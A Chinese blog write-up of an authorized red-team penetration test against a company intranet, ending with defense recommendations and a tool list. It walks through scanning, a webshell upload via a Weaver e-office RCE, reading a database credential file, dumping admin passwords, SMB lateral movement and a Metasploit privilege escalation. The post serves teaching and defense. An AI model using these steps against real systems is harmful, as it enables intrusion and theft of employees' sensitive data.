网络安全渗透攻击案例实战:某公司内网为目标的渗透测试全过程

知孤云出岫2025-07-25 19:51

目录

    • 一、案例背景
    • 二、目标分析(信息收集阶段)
      • [🌐 外部信息搜集](#🌐 外部信息搜集)
      • [🧠 指纹识别和端口扫描](#🧠 指纹识别和端口扫描)
    • 三、攻击流程(渗透测试全过程)
      • [🎯 步骤1:Web漏洞利用 ------ 泛微OA远程命令执行漏洞(CVE-2023-2648)](#🎯 步骤1:Web漏洞利用 —— 泛微OA远程命令执行漏洞(CVE-2023-2648))
      • [🔍 步骤2:权限维持与横向移动](#🔍 步骤2:权限维持与横向移动)
        • [2.1 获取本地密码信息](#2.1 获取本地密码信息)
        • [2.2 利用数据库读取其他管理员账号密码(Base64加密)](#2.2 利用数据库读取其他管理员账号密码(Base64加密))
        • [2.3 横向移动尝试:](#2.3 横向移动尝试:)
      • [🧠 步骤3:提权(本地提权)](#🧠 步骤3:提权(本地提权))
        • [漏洞利用:CVE-2016-0099(Windows Kernel 提权)](#漏洞利用:CVE-2016-0099(Windows Kernel 提权))
    • 四、攻击成果与影响
    • 五、防御建议
    • 六、关键使用工具列表

一、案例背景

  • 目标系统:某企业内部信息管理平台(Web系统 + 内网资源)

  • 测试授权:企业授权渗透测试,属于红队演练

  • 测试目的

    • 评估目标系统外部攻击面
    • 验证内网隔离和身份访问机制的安全性
    • 检测存在的高危漏洞

二、目标分析(信息收集阶段)

🌐 外部信息搜集

  • 使用工具:whoisnslookuptheHarvester

  • 收集内容:

    • 公司域名信息
    • 邮箱格式
    • 员工姓名/社交信息
    • 公布的IP段

🧠 指纹识别和端口扫描

  • 工具:nmap + whatweb + FOFA + Shodan

  • 发现信息:

    • 开放端口:80、443、21、22、445
    • 存在一台OA系统(泛微e-office)
bash 复制代码 
nmap -sS -sV -T4 -p- -Pn target_ip
whatweb http://target_ip

三、攻击流程(渗透测试全过程)

🎯 步骤1:Web漏洞利用 ------ 泛微OA远程命令执行漏洞(CVE-2023-2648)

  • 漏洞描述:某版本的e-office存在未授权RCE
  • 攻击方式:构造特定POST请求执行系统命令
bash 复制代码 
POST /page/exportImport/uploadOperation.jsp
Content-Type: multipart/form-data

file=@payload.jsp
  • 效果:上传webshell成功,获得Web权限

✅ 权限:www用户权限,进入Web目录

🔍 步骤2:权限维持与横向移动

2.1 获取本地密码信息
bash 复制代码 
dir /a /s | findstr config
type C:\Program Files\eOffice\config\db.properties
  • 拿到数据库密码 dbuser / dbpass,进一步连接数据库后台。
2.2 利用数据库读取其他管理员账号密码(Base64加密)
sql 复制代码 
SELECT username, password FROM user_table;
  • 解密后成功获得admin账号登录后台权限。
2.3 横向移动尝试:
  • 内网扫描工具:netstatarp -anmap -sP
  • 工具:msf, CrackMapExec, Impacket, smbclient
bash 复制代码 
smbclient //192.168.1.100/share -U "admin"
  • 发现另一台文件服务器开放smb,尝试连接并获取敏感文档。

🧠 步骤3:提权(本地提权)

  • 目标主机系统:Windows Server 2012 R2
  • 工具:WinPEAS, Sherlock, MSF local_exploit_suggester
漏洞利用:CVE-2016-0099(Windows Kernel 提权)
  • 使用Metasploit进行自动化提权:
bash 复制代码 
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run
  • 成功提权为System权限

四、攻击成果与影响

项目 结果
拿到webshell
获取数据库访问权限
获得OA系统管理员账户
横向入侵到文件服务器
成功提权为System权限
发现大量员工身份证件、薪资文档等敏感资料

五、防御建议

安全措施 建议内容
漏洞修补 尽快升级泛微e-office系统,打补丁
Web防护 WAF防护上传接口,过滤执行脚本
内网隔离 文件服务器应设置访问策略,不应开放匿名访问
权限控制 最小权限原则,限制System提权条件
日志审计 启用webshell行为监控与文件上传审计
应急响应 建立SOC联动机制,实现告警联动

六、关键使用工具列表

类型 工具名称 用途
信息收集 nmap, whatweb, FOFA 扫描与指纹识别
Web攻击 Burp Suite, curl, sqlmap 注入与漏洞利用
提权工具 WinPEAS, Metasploit 本地提权
横向移动 CrackMapExec, Impacket SMB、NTLM中继
后门控制 msfconsole, Behinder 维持访问通道
相关推荐
小红卒1 小时前
海康威视未授权访问漏洞 (CVE-2017-7921)复现研究
安全
Data-Miner3 小时前
精品可编辑PPT | 大模型与智能体安全风险治理与防护
安全
Bug.ink4 小时前
BUUCTF——WEB(7)
web安全·网络安全·buuctf
咕噜企业分发小米4 小时前
直播云服务器安全防护有哪些最新的技术趋势?
运维·服务器·安全
九河云5 小时前
数据驱动未来,华为云DWS为智能决策提速
大数据·人工智能·安全·机器学习·华为云
Dr.Alex Wang6 小时前
Google Firebase 实战教学 - Streamlit、Bucket、Firebase
数据库·python·安全·googlecloud
chipsense6 小时前
强电流环境下用霍尔电流传感器,安全性能有保障么?
安全·霍尔电流传感器
安全渗透Hacker6 小时前
参数未校验导致的DOS(服务拒绝)问题典型场景
java·安全·web安全·网络安全·安全性测试
bigHead-6 小时前
Git合并操作详解:安全高效地合并远程分支
git·安全·elasticsearch
pusheng20256 小时前
双气联防技术在下一代储能系统安全预警中的应用
前端·安全
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05jdk21下载、安装(Windows、Linux、macOS)06【踩坑笔记】50系显卡适配的 PyTorch 安装07Opencode CLI 安装成功,但是启动失败08手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!09全球最强模型Grok4,国内已可免费使用!(附教程)10Claude Code Plan 模式完全指南:从入门到精通